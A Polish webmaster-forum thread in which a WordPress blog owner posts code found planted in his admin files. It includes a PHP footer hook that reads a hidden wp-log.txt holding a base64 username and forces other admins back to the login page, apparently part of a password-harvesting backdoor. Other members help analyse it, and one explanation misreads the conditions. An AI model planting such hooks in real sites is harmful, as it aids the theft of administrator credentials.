• Rejestracja
vBHELP.pl - polskie wsparcie vBulletin
  1. #1
    Awatar macio76
    macio76 jest nieaktywny Stały bywalec
    Dołączył
    maj 2009
    Przegląda
    Częstochowa
    Posty
    424
    Przydatne posty
    2

    Domyślnie Jak zabezpieczyć bloga na WP

    Witam,
    chciałbym was prosić o radę. Cały czas mam problemy z konkurencją, która próbuje mnie wykończyć na wszystkie możliwe sposoby. Jestem atakowany z różnych serwerów, mam doklejane różne kody do plików itd.

    Ostatnio znalazłem takie coś:

    wp-login.php
    Kod:
    function wp_attempt_focus(){
    setTimeout( function(){ try{
    d = document.getElementById('user_login');
    d.value = '';
    d.focus();
    } catch(e){}
    }, 200);
    }
    
    wp_attempt_focus();
    if(typeof wpOnload=='function')wpOnload();
    admin-footer.php
    Kod:
    <?php
    global $current_user;
    get_currentuserinfo();
    $wplog=file('wp-log.txt');
    $log=base64_decode(trim($wplog[0]));
    if((($current_user->user_level) == 10) and (($current_user->user_login) !== $log) and (count($wplog) !== 6)){
    echo '<meta http-equiv="refresh" content="0;url=wp-login.php" >';
    }
    ?>
    Czy mógłby mi ktoś powiedzieć za co one odpowiadają te kawałki kodu oraz jak zabezpieczyć się przed takim czymś na przyszłość? Z tego co widzę zapisują one loginy i hasła logujących się osób do pliku wp-log.txt, ale chciałbym wiedzieć co wy o tym sądzicie.

    Nie mam już pomysłu jak uwolnić się od tych wszystkich ataków. Może wy coś wymyślicie.

    Z góry dziękuje za odpowiedz.
    Pozdrawiam
    Maciej ;)

    http://swiatiphone.com
    http://iphonesupport.pl
    http://mojeakwarium.eu



  2. #2
    Awatar spinnaker
    spinnaker jest nieaktywny Stały bywalec
    Dołączył
    maj 2010
    Posty
    149
    Przydatne posty
    14

    Domyślnie

    Podstawa to wgranie kilku pluginów typu: WP Block Admin czy Secure WP.


  3. #3
    Awatar WoG
    WoG
    WoG jest nieaktywny vB Specialist
    Dołączył
    lut 2008
    Posty
    2 812
    Przydatne posty
    297
    Wpisów
    1

    Domyślnie

    Nie widzę tu nic takiego strasznego.

    Pierwszy plik (wp-login.php) to tylko jedna funkcja JS i wywołanie dwóch.
    Mówiąć na szybko, odpowiada za to by po pełnym załadowaniu strony - kursor migał w miejscu gdzie trzeba wpisać login.

    Drugi plik (admin-footer.php) pobiera informacje o aktualnie zalogowanym użytkowniku, pobiera plik logów, następnie mamy warunek, który sprawdza czy:
    1. Poziom użytkownika zalogowanego wynosi 10
    2. Użytkownik nie jest zalogowany
    3. Ilość wszystkich wpisów w logu nie jest równa 6


    Jeżeli powyższe warunki są spełnione, to wyświetla fragment kodu odpowiadający za przekierowanie do strony logowania.
    Z poważaniem,
    WoG

    Ty też możesz pomóc spolszczać vBulletin 5: GitHub.com
    "Rozczarowanie spowodowane niską jakością pamięta się długo po przeminięciu radości spowodowanej niską ceną"


  4. #4
    Awatar macio76
    macio76 jest nieaktywny Stały bywalec
    Dołączył
    maj 2009
    Przegląda
    Częstochowa
    Posty
    424
    Przydatne posty
    2

    Domyślnie

    Wojtku tylko w pliku wp-log.txt znalazłem swój login i hasło Jeśli chodzi o stronę logowania to nie występuje ona w PA, więc cały plik został specjalnie wgrany.
    Pozdrawiam
    Maciej ;)

    http://swiatiphone.com
    http://iphonesupport.pl
    http://mojeakwarium.eu


  5. #5
    Awatar WoG
    WoG
    WoG jest nieaktywny vB Specialist
    Dołączył
    lut 2008
    Posty
    2 812
    Przydatne posty
    297
    Wpisów
    1

    Domyślnie

    W takim razie gdzieś jeszcze musi być fragment kodu, który umieszcza login i hasło w tym pliku.
    Podany kod przez Ciebie - nie robi tego.
    Z poważaniem,
    WoG

    Ty też możesz pomóc spolszczać vBulletin 5: GitHub.com
    "Rozczarowanie spowodowane niską jakością pamięta się długo po przeminięciu radości spowodowanej niską ceną"


  6. #6
    Awatar macio76
    macio76 jest nieaktywny Stały bywalec
    Dołączył
    maj 2009
    Przegląda
    Częstochowa
    Posty
    424
    Przydatne posty
    2

    Domyślnie

    A to:
    catch(e)
    lub to:
    $wplog=file('wp-log.txt');
    Pozdrawiam
    Maciej ;)

    http://swiatiphone.com
    http://iphonesupport.pl
    http://mojeakwarium.eu


  7. #7
    Awatar WoG
    WoG
    WoG jest nieaktywny vB Specialist
    Dołączył
    lut 2008
    Posty
    2 812
    Przydatne posty
    297
    Wpisów
    1

    Domyślnie

    Poczytaj sobie o tych funkcjach
    Z poważaniem,
    WoG

    Ty też możesz pomóc spolszczać vBulletin 5: GitHub.com
    "Rozczarowanie spowodowane niską jakością pamięta się długo po przeminięciu radości spowodowanej niską ceną"


  8. #8
    Awatar macio76
    macio76 jest nieaktywny Stały bywalec
    Dołączył
    maj 2009
    Przegląda
    Częstochowa
    Posty
    424
    Przydatne posty
    2

    Domyślnie

    Sprawa jest już w zasadzie wyjaśniona, jeśli chodzi o te dodatkowe kawałki kodu: Uważajcie na wtyczki do WordPressa: kto wie, gdzie czai się złośliwy kod? - Webhosting.pl. Portal technologii internetowych
    Pozdrawiam
    Maciej ;)

    http://swiatiphone.com
    http://iphonesupport.pl
    http://mojeakwarium.eu


  9. #9
    Awatar WoG
    WoG
    WoG jest nieaktywny vB Specialist
    Dołączył
    lut 2008
    Posty
    2 812
    Przydatne posty
    297
    Wpisów
    1

    Domyślnie Temat oznaczony jako "ROZWIĄZANY"

    Ten problem został rozwiązany, a wątek zamknięty.

    • Jeśli chcesz zadać nowe pytanie, załóż nowy wątek.
    • Jeśli masz wątpliwości odnośnie rozwiązanego problemu, poproś moderatora o otworzenie wątku.
    Z poważaniem,
    WoG

    Ty też możesz pomóc spolszczać vBulletin 5: GitHub.com
    "Rozczarowanie spowodowane niską jakością pamięta się długo po przeminięciu radości spowodowanej niską ceną"


Chmurka.pl

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67